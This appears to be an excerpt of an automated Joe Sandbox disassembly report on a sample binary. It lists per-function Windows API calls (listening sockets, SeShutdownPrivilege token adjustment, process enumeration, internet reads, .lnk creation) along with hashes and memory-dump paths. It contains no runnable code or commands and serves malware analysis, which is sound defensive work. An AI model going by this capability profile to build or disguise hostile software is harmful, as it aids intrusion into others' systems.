                                                          • API ID: AdjustErrorExitLastLookupPrivilegePrivilegesTokenValueWindows
                                                          • String ID: $@$SeShutdownPrivilege
                                                          • API String ID: 2234035333-194228
                                                          • Opcode ID: fb6322adbc2d09c40510b4c56efd78d931b7c3b7d8293610355a81f5a795dc2c
                                                          • Instruction ID: 958800406560af33543bdf247d93f31ba3e9d45ad460d66277406c6c7fa6f52c
                                                          • Opcode Fuzzy Hash: fb6322adbc2d09c40510b4c56efd78d931b7c3b7d8293610355a81f5a795dc2c
                                                          • Instruction Fuzzy Hash: 5A0126317916116BF72C6268EC8AFBF72DCEB04350F24042CF923E60D2DE513D8195A0
                                                          APIs
                                                          • socket.WSOCK32(00000002,00000001,00000006,?,00000002,00000000), ref: 00CD62DC
                                                          • WSAGetLastError.WSOCK32(00000000), ref: 00CD62EB
                                                          • bind.WSOCK32(00000000,?,00000010), ref: 00CD6307
                                                          • listen.WSOCK32(00000000,00000005), ref: 00CD6316
                                                          • WSAGetLastError.WSOCK32(00000000), ref: 00CD6330
                                                          • closesocket.WSOCK32(00000000,00000000), ref: 00CD6344
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1680077288.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true
                                                          • Associated: 00000000.00000002.1680065303.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1680120931.0000000000CEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1680120931.0000000000D14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1680154904.0000000000D1E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1680169347.0000000000D27000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_c60000_CJE003889.jbxd
                                                          Similarity
                                                          • API ID: ErrorLast$bindclosesocketlistensocket
                                                          • String ID:
                                                          • API String ID: 1279440585-0
                                                          • Opcode ID: 31a017d2451c2bb039771a9b9ed8bed6c9be4f0e891c6f28c9fac3b2e90a8bdb
                                                          • Instruction ID: faeb9810e25baf56c9bc00919486db4070eefef04b41638b1fdde68811fb0190
                                                          • Opcode Fuzzy Hash: 31a017d2451c2bb039771a9b9ed8bed6c9be4f0e891c6f28c9fac3b2e90a8bdb
                                                          • Instruction Fuzzy Hash: 1221B1716002049FDB20EF64C885B6EB7A9EF49720F14815DFA66AB3E1C770AD05DB51
                                                          APIs
                                                            • Part of subcall function 00C80DB6: std::exception::exception.LIBCMT ref: 00C80DEC
                                                            • Part of subcall function 00C80DB6: __CxxThrowException@8.LIBCMT ref: 00C80E01
                                                          • _memmove.LIBCMT ref: 00CB0258
                                                          • _memmove.LIBCMT ref: 00CB036D
                                                          • _memmove.LIBCMT ref: 00CB0414
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1680077288.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true
                                                          • Associated: 00000000.00000002.1680065303.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1680120931.0000000000CEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1680120931.0000000000D14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1680154904.0000000000D1E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1680169347.0000000000D27000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_c60000_CJE003889.jbxd
                                                          Similarity
                                                          • API ID: _memmove$Exception@8Throwstd::exception::exception
                                                          • String ID:
                                                          • API String ID: 1300846289-0
                                                          • Opcode ID: 7daf9d29f3d6e356d297a2c969f843ae75f4b916048e7e35a48c71da5968c6e3
                                                          • Instruction ID: c37e732ae8475afbfc4fafe3d0133f2cccd8625a0112b5e858d398ad4a16fb73
                                                          • Opcode Fuzzy Hash: 7daf9d29f3d6e356d297a2c969f843ae75f4b916048e7e35a48c71da5968c6e3
                                                          • Instruction Fuzzy Hash: 6C02CFB0A00209EBCF04DF64D981AAEBBF5EF44300F24C469E80ADB355EB35DA55DB91
                                                          APIs
                                                            • Part of subcall function 00C62612: GetWindowLongW.USER32(?,000000EB), ref: 00C62623
                                                          • DefDlgProcW.USER32(?,?,?,?,?), ref: 00C619FA
                                                          • GetSysColor.USER32(0000000F), ref: 00C61A4E
                                                          • SetBkColor.GDI32(?,00000000), ref: 00C61A61
                                                            • Part of subcall function 00C61290: DefDlgProcW.USER32(?,00000020,?), ref: 00C612D8
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1680077288.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true
                                                          • Associated: 00000000.00000002.1680065303.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1680120931.0000000000CEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1680120931.0000000000D14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1680154904.0000000000D1E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1680169347.0000000000D27000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_c60000_CJE003889.jbxd
                                                          Similarity
                                                          • API ID: ColorProc$LongWindow
                                                          • String ID:
                                                          • API String ID: 3744519093-0
                                                          • Opcode ID: cc9498c6ff0308a49bce1804edc48067282caf2081194505b96eb76cb9260d32
                                                          • Instruction ID: a1e19c2001b8f045705a71b3e2f4f219aae4f8cef37bf3150e4da7be7a1f6288
                                                          • Opcode Fuzzy Hash: cc9498c6ff0308a49bce1804edc48067282caf2081194505b96eb76cb9260d32
                                                          • Instruction Fuzzy Hash: 39A14A71116584BEEA38AB6AADC8E7F256CDF42347B1D0119FD22D6193CA249F02F271
                                                          APIs
                                                          • FindFirstFileW.KERNEL32(?,?), ref: 00CCBCE6
                                                          • _wcscmp.LIBCMT ref: 00CCBD16
                                                          • _wcscmp.LIBCMT ref: 00CCBD2B
                                                          • FindNextFileW.KERNEL32(00000000,?), ref: 00CCBD3C
                                                          • FindClose.KERNEL32(00000000,00000001,00000000), ref: 00CCBD6C
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1680077288.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true
                                                          • Associated: 00000000.00000002.1680065303.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1680120931.0000000000CEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1680120931.0000000000D14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1680154904.0000000000D1E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1680169347.0000000000D27000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_c60000_CJE003889.jbxd
                                                          Similarity
                                                          • API ID: Find$File_wcscmp$CloseFirstNext
                                                          • String ID:
                                                          • API String ID: 2387731787-0
                                                          • Opcode ID: b19608c982350bb7460c78a8682ed787db322e5c2ebec698d9323f355fcc9124
                                                          • Instruction ID: c2ac56c100514c637530d38f71e5139fb227a01dbef11e1a89b1c98cd7781995
                                                          • Opcode Fuzzy Hash: b19608c982350bb7460c78a8682ed787db322e5c2ebec698d9323f355fcc9124
                                                          • Instruction Fuzzy Hash: 9A519A75A046029FC714DFA8D4D1EAAB3E8EF49324F10461DF9668B3A1DB30EE05DB91
                                                          APIs
                                                            • Part of subcall function 00CD7D8B: inet_addr.WSOCK32(00000000,?,00000000,?,?,?,00000000), ref: 00CD7DB6
                                                          • socket.WSOCK32(00000002,00000002,00000011,?,?,00000000), ref: 00CD679E
                                                          • WSAGetLastError.WSOCK32(00000000), ref: 00CD67C7
                                                          • bind.WSOCK32(00000000,?,00000010), ref: 00CD6800
                                                          • WSAGetLastError.WSOCK32(00000000), ref: 00CD680D
                                                          • closesocket.WSOCK32(00000000,00000000), ref: 00CD6821
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1680077288.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true
                                                          • Associated: 00000000.00000002.1680065303.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1680120931.0000000000CEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1680120931.0000000000D14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1680154904.0000000000D1E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1680169347.0000000000D27000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_c60000_CJE003889.jbxd
                                                          Similarity
                                                          • API ID: ErrorLast$bindclosesocketinet_addrsocket
                                                          • String ID:
                                                          • API String ID: 99427753-0
                                                          • Opcode ID: 45969fb5413bd5e9fcb6ae9df51b45b5896279f15ff7cb86260266eaba8607c3
                                                          • Instruction ID: 7d539602d2d445987b341864ceaf71ea03b776ac1f9094f356c03788d031c290
                                                          • Opcode Fuzzy Hash: 45969fb5413bd5e9fcb6ae9df51b45b5896279f15ff7cb86260266eaba8607c3
                                                          • Instruction Fuzzy Hash: 2141B175A00214AFEB20AF648CC6F6E77E8DF49754F04855DFA16AB3C2CA709D01A791
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1680077288.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true
                                                          • Associated: 00000000.00000002.1680065303.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1680120931.0000000000CEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1680120931.0000000000D14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1680154904.0000000000D1E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1680169347.0000000000D27000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_c60000_CJE003889.jbxd
                                                          Similarity
                                                          • API ID: Window$EnabledForegroundIconicVisibleZoomed
                                                          • String ID:
                                                          • API String ID: 292994002-0
                                                          • Opcode ID: 436ca8636684032c98c9d55f8304c0d0903990b5ac757f285bbc6cf76166530e
                                                          • Instruction ID: b5f02065aa8b224f6e50f842500e4e307918010db902cff4a41e7c85d3441689
                                                          • Opcode Fuzzy Hash: 436ca8636684032c98c9d55f8304c0d0903990b5ac757f285bbc6cf76166530e
                                                          • Instruction Fuzzy Hash: DD11C4717019916FDB215F27DC84B6EBB9CFF447A5B404428F846D7291CBB0DD428AA4
                                                          APIs
                                                          • GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 00CB80C0
                                                          • GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 00CB80CA
                                                          • GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 00CB80D9
                                                          • HeapAlloc.KERNEL32(00000000,?,00000002,?,00000000,?), ref: 00CB80E0
                                                          • GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 00CB80F6
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1680077288.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true
                                                          • Associated: 00000000.00000002.1680065303.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1680120931.0000000000CEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1680120931.0000000000D14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1680154904.0000000000D1E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1680169347.0000000000D27000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_c60000_CJE003889.jbxd
                                                          Similarity
                                                          • API ID: HeapInformationToken$AllocErrorLastProcess
                                                          • String ID:
                                                          • API String ID: 44706859-0
                                                          • Opcode ID: 0b79a6a751ee2ef5ffd56c89baa29e69028f5f3cb91fd6cea2c744e3b4374823
                                                          • Instruction ID: a3b3bbb1025e425791d6eb47fef03aa35ed466ec3f01c2cc5c69a48722d8a982
                                                          • Opcode Fuzzy Hash: 0b79a6a751ee2ef5ffd56c89baa29e69028f5f3cb91fd6cea2c744e3b4374823
                                                          • Instruction Fuzzy Hash: 78F06831241344AFD7104F65DCCDFAF3BACEF85755F000029F545C6150CB619D46DA60
                                                          APIs
                                                          • CoInitialize.OLE32(00000000), ref: 00CCC432
                                                          • CoCreateInstance.OLE32(00CF2D6C,00000000,00000001,00CF2BDC,?), ref: 00CCC44A
                                                            • Part of subcall function 00C67DE1: _memmove.LIBCMT ref: 00C67E22
                                                          • CoUninitialize.OLE32 ref: 00CCC6B7
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1680077288.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true
                                                          • Associated: 00000000.00000002.1680065303.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1680120931.0000000000CEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1680120931.0000000000D14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1680154904.0000000000D1E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1680169347.0000000000D27000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_c60000_CJE003889.jbxd
                                                          Similarity
                                                          • API ID: CreateInitializeInstanceUninitialize_memmove
                                                          • String ID: .lnk
                                                          • API String ID: 2683427295-24824748
                                                          • Opcode ID: ea27080fa7e4d8f8a84ee76b5c36153a7628fdd8b819c3fecb8df0e5a5f1b399
                                                          • Instruction ID: 06719d70734670fe2a044ad0513d79655846f89345949a83527b5213227f6f55
                                                          • Opcode Fuzzy Hash: ea27080fa7e4d8f8a84ee76b5c36153a7628fdd8b819c3fecb8df0e5a5f1b399
                                                          • Instruction Fuzzy Hash: 6EA11AB1104205AFD710EF54C8D1EAFB7ECEF99354F004A2CF1959B192DB71AA4ACB62
                                                          APIs
                                                          • LoadLibraryA.KERNEL32(kernel32.dll,?,00C64AD0), ref: 00C64B45
                                                          • GetProcAddress.KERNEL32(00000000,GetNativeSystemInfo), ref: 00C64B57
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1680077288.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true
                                                          • Associated: 00000000.00000002.1680065303.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1680120931.0000000000CEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1680120931.0000000000D14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1680154904.0000000000D1E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1680169347.0000000000D27000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_c60000_CJE003889.jbxd
                                                          Similarity
                                                          • API ID: AddressLibraryLoadProc
                                                          • String ID: GetNativeSystemInfo$kernel32.dll
                                                          • API String ID: 2574300362-192647395
                                                          • Opcode ID: cd04800670f355ab96984234f17bd6f981046ace688aa39e6065ba185bb8e83d
                                                          • Instruction ID: 692a362ada592880a11a1e6bae20cbd128f950823adb1db62035ac5ec1efe680
                                                          • Opcode Fuzzy Hash: cd04800670f355ab96984234f17bd6f981046ace688aa39e6065ba185bb8e83d
                                                          • Instruction Fuzzy Hash: 2BD05E35A10B57CFD7309F32ECA8B0A76E4AF86391B11C83ED496DA150E770E881CA58
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1680077288.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true
                                                          • Associated: 00000000.00000002.1680065303.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1680120931.0000000000CEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1680120931.0000000000D14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1680154904.0000000000D1E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1680169347.0000000000D27000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_c60000_CJE003889.jbxd
                                                          Similarity
                                                          • API ID: __itow__swprintf
                                                          • String ID:
                                                          • API String ID: 674341424-0
                                                          • Opcode ID: 6bb9fc472d09262efaa6bab1ce9f6e320e22e2fbcca41eaa8bd9ca47aac995ef
                                                          • Instruction ID: 470f81972c213190002871dd66df2ddb25e3c5e54e8c07393474b6218040b33b
                                                          • Opcode Fuzzy Hash: 6bb9fc472d09262efaa6bab1ce9f6e320e22e2fbcca41eaa8bd9ca47aac995ef
                                                          • Instruction Fuzzy Hash: C722BA716083419FC724DF24C881BAFB7E4EF85314F14892DF89A97291DB71EA09DB92
                                                          APIs
                                                          • CreateToolhelp32Snapshot.KERNEL32 ref: 00CDEE3D
                                                          • Process32FirstW.KERNEL32(00000000,?), ref: 00CDEE4B
                                                            • Part of subcall function 00C67DE1: _memmove.LIBCMT ref: 00C67E22
                                                          • Process32NextW.KERNEL32(00000000,?), ref: 00CDEF0B
                                                          • CloseHandle.KERNEL32(00000000,?,?,?), ref: 00CDEF1A
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1680077288.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true
                                                          • Associated: 00000000.00000002.1680065303.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1680120931.0000000000CEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1680120931.0000000000D14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1680154904.0000000000D1E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1680169347.0000000000D27000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_c60000_CJE003889.jbxd
                                                          Similarity
                                                          • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32_memmove
                                                          • String ID:
                                                          • API String ID: 2576544623-0
                                                          • Opcode ID: 884a576d972e89d5bd27f6d809b104589ab7db3806cfdbca2fcbd6a68006bcad
                                                          • Instruction ID: 0c538fb699cd775ef80e30dceba4f153b10e3b5e461999b39d012966b3ea5da3
                                                          • Opcode Fuzzy Hash: 884a576d972e89d5bd27f6d809b104589ab7db3806cfdbca2fcbd6a68006bcad
                                                          • Instruction Fuzzy Hash: 81519C71108301AFD320EF20C882E6FB7E8EF98700F50492DF595972A1EB30A909DB92
                                                          APIs
                                                          • lstrlenW.KERNEL32(?,?,?,00000000), ref: 00CBE628
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1680077288.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true
                                                          • Associated: 00000000.00000002.1680065303.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1680120931.0000000000CEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1680120931.0000000000D14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1680154904.0000000000D1E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1680169347.0000000000D27000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_c60000_CJE003889.jbxd
                                                          Similarity
                                                          • API ID: lstrlen
                                                          • String ID: ($|
                                                          • API String ID: 1659193697-1631851259
                                                          • Opcode ID: d5b025d49006e4e44ad59505af0980239ca9b69d05b81237b8baa5dfe3da7be9
                                                          • Instruction ID: 1b76a62e194e715900bcf819526b9a368ef8446b2ac9ec418c421a0bf52f8397
                                                          • Opcode Fuzzy Hash: d5b025d49006e4e44ad59505af0980239ca9b69d05b81237b8baa5dfe3da7be9
                                                          • Instruction Fuzzy Hash: 00323575A007059FDB28DF59C4819AAB7F0FF48710F11C46EE8AADB3A1EB70A941CB44
                                                          APIs
                                                          • InternetQueryDataAvailable.WININET(00000001,?,00000000,00000000,00000000,?,?,?,?,?,?,?,?,00CD180A,00000000), ref: 00CD23E1
                                                          • InternetReadFile.WININET(00000001,00000000,00000001,00000001), ref: 00CD2418
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1680077288.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true
                                                          • Associated: 00000000.00000002.1680065303.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1680120931.0000000000CEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1680120931.0000000000D14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1680154904.0000000000D1E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1680169347.0000000000D27000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_c60000_CJE003889.jbxd
                                                          Similarity
                                                          • API ID: Internet$AvailableDataFileQueryRead
                                                          • String ID:
                                                          • API String ID: 599397726-0
                                                          • Opcode ID: 666efb043e938793006d8359d23a56621b6cc359bcd377358211b3746f1f0b6f
                                                          • Instruction ID: 304eb0f8dd521374ddc0e7c4628b10fa99ea2e7a4f5c581af01e9ed973c754a4
                                                          • Opcode Fuzzy Hash: 666efb043e938793006d8359d23a56621b6cc359bcd377358211b3746f1f0b6f
                                                          • Instruction Fuzzy Hash: C041D371904209BFEB20DE95DC85FBBB7ACEB50324F10402FFB51A6350DBB59E41A660
                                                          APIs
                                                          • SetErrorMode.KERNEL32(00000001), ref: 00CCB40B
                                                          • GetDiskFreeSpaceExW.KERNEL32(?,?,?,?), ref: 00CCB465
                                                          • SetErrorMode.KERNEL32(00000000,00000001,00000000), ref: 00CCB4B2
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1680077288.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true
                                                          • Associated: 00000000.00000002.1680065303.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1680120931.0000000000CEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1680120931.0000000000D14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1680154904.0000000000D1E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1680169347.0000000000D27000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_c60000_CJE003889.jbxd
                                                          Similarity
                                                          • API ID: ErrorMode$DiskFreeSpace
                                                          • String ID:
                                                          • API String ID: 1682464887-0
                                                          • Opcode ID: 168d830f67780c20121887fa5650dfe10b765cb27f4cf0c7c47daf716d9a2ebf
                                                          • Instruction ID: b34a9850b0a3f83b556133a249726123a9393f60c5150c8f81c838a2759a2ed6
                                                          • Opcode Fuzzy Hash: 168d830f67780c20121887fa5650dfe10b765cb27f4cf0c7c47daf716d9a2ebf
                                                          • Instruction Fuzzy Hash: A3215C75A00508EFCB00EFA5D8C1EEDBBB8FF49310F1480A9E905AB361CB319956DB51
                                                          APIs
                                                            • Part of subcall function 00C80DB6: std::exception::exception.LIBCMT ref: 00C80DEC
                                                            • Part of subcall function 00C80DB6: __CxxThrowException@8.LIBCMT ref: 00C80E01
                                                          • LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 00CB882B
                                                          • AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 00CB8858
                                                          • GetLastError.KERNEL32 ref: 00CB8865
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1680077288.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true
                                                          • Associated: 00000000.00000002.1680065303.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1680120931.0000000000CEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1680120931.0000000000D14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1680154904.0000000000D1E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1680169347.0000000000D27000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_c60000_CJE003889.jbxd
                                                          Similarity
                                                          • API ID: AdjustErrorException@8LastLookupPrivilegePrivilegesThrowTokenValuestd::exception::exception
                                                          • String ID:
                                                          • API String ID: 1922334811-0
                                                          • Opcode ID: 849f7108397b15b8f18a9e30facf20c312da0927814151e512343b0ee5535df8
                                                          • Instruction ID: 408370c1658d0deee5da393af62e43474114f6f2761e4328e7887e0b663db64d
                                                          • Opcode Fuzzy Hash: 849f7108397b15b8f18a9e30facf20c312da0927814151e512343b0ee5535df8
                                                          • Instruction Fuzzy Hash: 8F119AB2804204AFE718EFA4DCC5E6BB7ADEB44314B20852EF49687251EA71AC05CB60
                                                          APIs
                                                          • AllocateAndInitializeSid.ADVAPI32(?,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?), ref: 00CB8774
                                                          • CheckTokenMembership.ADVAPI32(00000000,?,?), ref: 00CB878B
                                                          • FreeSid.ADVAPI32(?), ref: 00CB879B
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1680077288.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true
                                                          • Associated: 00000000.00000002.1680065303.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1680120931.0000000000CEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1680120931.0000000000D14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1680154904.0000000000D1E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1680169347.0000000000D27000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_c60000_CJE003889.jbxd
                                                          Similarity
                                                          • API ID: AllocateCheckFreeInitializeMembershipToken
                                                          • String ID:
                                                          • API String ID: 3429775523-0
                                                          • Opcode ID: 6ac79da919ad3ab816d49aff0848c4e32c51fee5ece98a34083d19cfb8b45786
                                                          • Instruction ID: d29d2d1521c3a02996f44b586b00a2fb402286d5d9bbbb8dfa16894f2a3b23a4
                                                          • Opcode Fuzzy Hash: 6ac79da919ad3ab816d49aff0848c4e32c51fee5ece98a34083d19cfb8b45786
                                                          • Instruction Fuzzy Hash: 03F04975A1130CBFDF00DFF4DC89AAEBBBCEF08211F1044A9A901E6181E7756A048B50
                                                          APIs
                                                          • FindFirstFileW.KERNEL32(?,?), ref: 00CCC6FB
                                                          • FindClose.KERNEL32(00000000), ref: 00CCC72B
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1680077288.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true
                                                          • Associated: 00000000.00000002.1680065303.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1680120931.0000000000CEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1680120931.0000000000D14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1680154904.0000000000D1E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1680169347.0000000000D27000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_c60000_CJE003889.jbxd
